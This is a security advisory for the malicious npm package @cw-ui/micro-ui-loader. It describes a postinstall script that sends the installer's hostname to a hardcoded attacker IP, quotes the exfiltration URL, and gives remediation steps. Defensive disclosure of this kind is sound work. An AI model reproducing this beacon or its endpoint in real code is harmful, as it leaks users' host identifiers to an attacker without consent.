MAL-2026-10557

    Dashboard / Malicious Package / MAL-2026-10557

    MAL-2026-10557

    Published: 14 Jul 2026Last Modified: 14 Jul 2026Aliases: 
    GHSA-fq95-jj7h-pj3w

    Summary: Malicious code in @cw-ui/micro-ui-loader (npm)

    Details: Source: amazon-inspector (b558c8d90850ea9817e236b445ba2bc1020a35a81a099a5e1575ef705b00bd39) On `npm install`, postinstall.js reads the installer's hostname via `os.hostname()` and sends it as a query parameter to a hardcoded bare-IP HTTP endpoint: `http://37.60.255.218/skybackground.png?display=${encodeURIComponent(displayProfile)}`. The response is saved locally as `downloaded-image.jpg` as a cover story. The package's README advertises 'Simple Text Utils' for string operations (capitalize/reverse/wordCount), and `index.js` exports only `downloadImage` — neither matches the stated purpose. The `author` field is the placeholder 'Your Name'. The combination of hardcoded bare-IP destination, plain HTTP, install-time auto-execution, host-identifier exfiltration, README/behavior mismatch, and placeholder metadata is a recon beacon shape, not legitimate functionality. Installing this package leaks the host's identifier to an attacker-controlled IP without consent. Source: ghsa-malware (b1da608bf8cf981168018faac5288cb977566ce3a7444ab445fb285003137ee6) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

    Affected packages

    Package

    Name: @cw-ui/micro-ui-loader

    Purl: pkg:npm/%40cw-ui/micro-ui-loader

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    2.0.0
    MAL-2026-10557 | CVE-DB